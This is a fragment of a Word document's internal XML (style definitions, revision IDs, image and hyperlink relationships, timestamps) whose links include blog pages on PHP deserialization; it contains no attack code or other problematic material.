    <w:rsid w:val="00AA1B8B"/>
    <w:rsid w:val="00AF14BC"/>
    <w:rsid w:val="00B25A83"/>
    <w:rsid w:val="00BB0144"/>
    <w:rsid w:val="00BC33CB"/>
    <w:rsid w:val="00BD4F7D"/>
    <w:rsid w:val="00BF6B73"/>
    <w:rsid w:val="00C00C92"/>
    <w:rsid w:val="00C06AC9"/>
    <w:rsid w:val="00C214C8"/>
    <w:rsid w:val="00C47116"/>
    <w:rsid w:val="00C63491"/>
    <w:rsid w:val="00D14922"/>
    <w:rsid w:val="00D241C0"/>
    <w:rsid w:val="00D83FFB"/>
    <w:rsid w:val="00DB6BE2"/>
    <w:rsid w:val="00DC0840"/>
    <w:rsid w:val="00E1645B"/>
    <w:rsid w:val="00E44B39"/>
    <w:rsid w:val="00E56281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44B39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A5504A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi" w:eastAsia="黑体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A5504A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi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A5504A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi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A5504A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi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DC0840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977B74"/>
    <w:rPr>
      <w:rFonts w:ascii="Fira Code" w:cs="Times New Roman (正文 CS 字体)" w:eastAsia="宋体" w:hAnsi="Fira Code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977B74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72" Target="media/rId72.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId20" Target="media/rId20.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId37" Target="media/rId37.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId54" Target="media/rId54.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId75" Target="media/rId75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60" Target="media/rId60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57" Target="media/rId57.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId23" Target="media/rId23.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId63" Target="media/rId63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hyperlink" Id="rId80" Target="https://chenxi9981.github.io/php&#21453;&#24207;&#21015;&#21270;/#&#21407;&#29983;&#31867;&#30456;&#20851;" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId85" Target="https://godyu.com/13917.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId79" Target="https://www.cnblogs.com/Litsasuk/articles/1889699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chenxi9981.github.io/php&#21453;&#24207;&#21015;&#21270;/#&#21407;&#29983;&#31867;&#30456;&#20851;" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId85" Target="https://godyu.com/13917.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId79" Target="https://www.cnblogs.com/Litsasuk/articles/1889699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2026-06-11T11:02:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-11T11:02:01Z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